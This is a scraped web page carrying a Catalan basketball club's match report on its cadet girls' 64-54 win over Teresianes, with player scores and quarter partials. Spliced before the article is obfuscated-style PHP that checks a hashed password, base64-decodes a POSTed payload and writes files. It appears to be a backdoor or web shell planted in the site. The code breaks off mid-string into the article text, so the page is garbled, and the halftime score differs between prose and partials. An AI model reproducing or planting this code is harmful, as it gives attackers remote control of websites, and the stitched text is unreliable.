function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La intensitat defensiva del cadet femení C tomba l'equip de Teresianes (64-54) - Tgn Bàsquet Club -

La intensitat defensiva del cadet femení C tomba l’equip de Teresianes (64-54)

Updated: abril 14, 2015

En un partit amb moltes alternatives, el cadet femení C del TGN Bàsquet es va imposar al de Teresianes. L’equip lila no va poder distanciar-se del seu rival en els dos primers períodes, fruit de la seva irregularitat en el joc, però en el minut 15 de partit i amb 22-20 en el marcador, va ser capaç d’incrementar la seva activitat i intensitat defensiva per marcar un parcial de 16-5 que deixava el resultat al descans en 38-35. Aquest parcial va ser decisiu i tot i que les visitants van provar de reaccionar (50-44 a l’inici del quart període), mai van poder capgirar el resultat i el TGN Bàsquet va entrar en els minuts finals amb un avantatge tranquil·litzador (64-48).

TGN BASQUET “C” – BÀSQUET TERESIANES 64-54

TGN: Basterra (16), Andrés(4), Martin (8), De Barberà (12), Córcoles (2) – cinc inicial- Capellades, Companys (4), Miro (4), Gila, López (2), Ribas (2),Prieto (2). Tirs lliures  2/6. Faltes 21- Sense Eliminades.

BÀSQUET TERESIANES:  Vidiella (6), Ferre (10), Gonzàlez (10), Perarnau (4), Romero (12)–cinc inicial-Espelt, Sevil (9), Aliaga (3), Badia. Tirs lliures 6/22. Faltes 12. Sense eliminades.

Parcials:  14-12/ 24-13 (38-25 descans) / 10-15 / 16-14  (64-54 final)